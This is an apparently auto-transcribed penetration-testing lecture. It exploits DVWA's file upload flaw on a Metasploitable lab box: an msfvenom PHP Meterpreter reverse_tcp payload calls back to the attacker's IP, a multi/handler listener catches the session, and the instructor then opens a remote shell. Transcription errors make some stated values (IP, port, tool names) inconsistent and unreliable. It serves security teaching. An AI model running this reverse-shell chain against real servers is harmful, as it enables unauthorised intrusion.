In the previous lecture, we have seen how to exploit file upload vulnerability using Weebly. Now, in this lecture, we are going to see how to exploit same vulnerability, but this time around using Metasploit framework. So, Metasploit framework is basically an open source framework that is used in conducting attacks during penetration testing. So, first, what we are going to do, we are going to generate a payload. And a payload, just as we did using in the previous lecture using Weebly. So a payload is just as we have seen earlier, is just a malicious code that we are going to use to exploit any given vulnerability. So we are going to make use of a Metasploit tool called MSF Venom to generate our malicious PHP-based payload that we are going to upload into that particular website and then exploit the file offload vulnerability. So on the terminal here, I'll just type MSF Venom Venom -h to see all the various options that I can use alongside this particular tool. So when we go through here, you see the various options that the way to use this particular tool to generate a payload. So we can see it, MSF Venom, a Metasploit standalone payload generator. Perfect. So let me clear the terminal. So now I'm going to make use of it to generate my malicious PHP-based payload that I'm going to upload into that website. So I'm going to write MSF Venom, then I'm going to put -p to specify that I want the type of payload that I want to generate. So for this lecture, since we are going to upload that particular payload on a PHP-based web application, so we are going to generate a PHP payload. So I'm going to write -p and then PHP and then Metasploit. It is a Metasploit payload, and then reverse TCP. So it is a payload that will create a robust connection from the server to our Kali Linux attacking machine. So that is the payload. So PHP Metasploit reverse TCP. Now next, I'm going to specify the IP address of my machine so that the server will now connect back to this particular machine using this IP address, and then also the particular port that we want the connection to pass through of reaching our system. So I'm going to know my IP address. Let me split the terminal into two, split horizontally. So if I don't know my IP address, I can just enter the command sudo if config. All right, so I'm going to enter my password. So I'm going to go over to see my IP address, 10.02.19. So I'm going to specify my IP address using this particular option. lhost is 10.02.19. So I've specified to this particular payload generator, MSF Venom, that I want to that payload that is going to generate for me shall create back a connection from the machine that I'm exploiting via this IP address 10.02.19. Now the next option that I need to specify is the port number that the connection will pass through of reaching my system. So I want it to connect to my machine on L-port. So the L-port, I'm going to specify any number, just any number. So I'm going to make use of 444, so wait, you can put any number that you like. So I'm specifying that I want the connection to connect to my system via this port number. All right. So the next thing that I'm going to specify is the format of the payload using -f option. So I want the this particular MSF Venom to generate a raw payload for me. So I'm going to specify with this option raw, and then I want it to save it in with the name PHP. Okay, let me call it PHP shell, PHP shell.php. All right, so let's go over the commands again. MSF Venom is a tool that is a tool that is part of the Metasploit framework. It is used in generating malicious payload. So I use -p option that I want it to generate a payload for me, and the payload is PHP Metasploit reverse TCP payload. So basically a payload that will create a reverse connection from the server back to this particular machine that I am carrying out the attack on. So from the server, a connection, outward connection will come back from the server and connect back to this my attacking machine. So, and that is why I have to specify my IP address of the attacking machine that the connection will connect to, 10.0.2.19, and then the port number 4444, and then now the format of the payload. I want it to generate a raw payload for me. So a raw payload that I can be able to see the raw code. So I'll be able to see the raw code in that particular payload, and and then also the name of the payload is php shell.php. So I have specified the name of the file that is going to generate for me, php shell.php. So I'll just hit enter. All right, perfect. So we have successfully generated a payload using MS Venom, and if I do ls here, okay, so we can be able to see it, php shell.php. I can also open it. Let me make it Sublime Text Editor to open this php shell, and then hit enter. So we can see the payload has been generated for us, and we can see the IP address, and the port number has also been generated in the payload. So let me close the payload now. So we have done one aspect. Now the next thing that we are going to do now, I'm going to launch the Metasploit attacking tool. Okay, let me exit this. So next we are going to launch the Metasploit that we are going to carry out the attack from. So I'm going to launch MSF console. I'm going to issue the command MSF console, and then I'll just hit enter. All right, so perfect. So we have successfully launched MSF payload. So after launching MSF payload, I'm going to issue the command use exploit multi handler, and then I hit enter. All right, so I'm specified to my MSF Metasploit framework that I am using exploit multi-handler. Now the next thing, now I'm going to specify the payload that I want to use to attack that particular to carry out this particular attack. So I'm going to issue the command set payload as PHP. Remember that is the same payload that we generated. So PHP metapreter reverse TCP TCP. Then I'll also hit enter. So we have successfully set the payload, and we can issue the command options to see the various parameters that we need to set on this particular payload. So as you can see, we need to specify the L host and the L port. So L port has already been specified as 444. I remember that was the same port number that we specified in creating the payload using MSF Vino. So now I need to specify the L host. So I'm going to continue. I'll say set L host as 10.0.2.19. So L host, I've set it to 10.0.2.19. I'll just hit enter. Okay, so I can also run the option command again, options, to make sure everything has been set. So as you can see, our L host has been set as 10.0.2.19. Also the port number has been specified as 4444. Now this was the same local L host IP address that we have specified while creating the payload using MSF Vino, and also the port number 444 was the same port number that we specified in creating the payload using MSF Vino. So now I need to run the attack. To run the attack, I will simply issue the command run or exploit. So let me make use of exploit. So I'll just issue the command exploit, and then I'm going to hit enter. So now the attack is in process. Now I would go back to that particular website and then upload the payload, and then see whether I could get a Metapreter session. All right, so I'm going to enter my username. The username is admin, and also the password is password. All right, password. All right, so perfect. We have been able to log in So now I'll go to the upload, the file upload vulnerability section. Then now I'm going to browse. Now remember that we created our shell as php shell.php. So I'm going to select it and then I'm going to upload it. So as you can see, we have successfully uploaded the PHP shell. All right. So as usual, so I'll just copy here and then visit the shell, visit the page where the shell is, so that it will get executed and then we will get Metasploit session. So I'm going to copy this. Then I'm going to, remember we say it is 2 directory backward. So 2 directories backward from the IP address to the DVWA. So I'm going to paste it here so that I can navigate to that particular link where this PHP shell has been uploaded. So I'm going to hit enter. All right. So I've hit enter. Now I'm going to go back to my Metasploit, and as you can see, Metasploit. As you can see, we have successfully gained a Metasploit session. Now we can be able to interact with that particular server, with the Metasploitable server, and run various commands. So sysinfo so basically, to see the commands that we can run, we can just issue the command help. Now this will list all the various commands that we can use to interact with the machine that we have successfully hacked into. All right, so we can issue command like sysinfo to get information about the remote system. So sysinfo, hit enter. So we can see it is a Metasploitable, which was the server that that particular web application DVWA was hosted on. As you can see, it is, and we can pwd will give us the current working directory, which is an upload, where we upload that particular PHP shell. And so we can go through all those commands there and try to run these commands to interact with the server that we have hacked. So I can also drop myself into the shell. I can write shell and then hit enter. So we are now into the Metasploitable shell, and I can do pwd to get print the working directory where I'm in, and I can also run various system commands to interact with the Metasploitable 2 via its shell. So to exit out of the shell, I'll just enter exit, and then I'll come back to the Metasploit section. So to exit the Metasploit, I'll also enter the command exit. Now this will exit me, and then finally also exit to exit out of the Metasploit framework.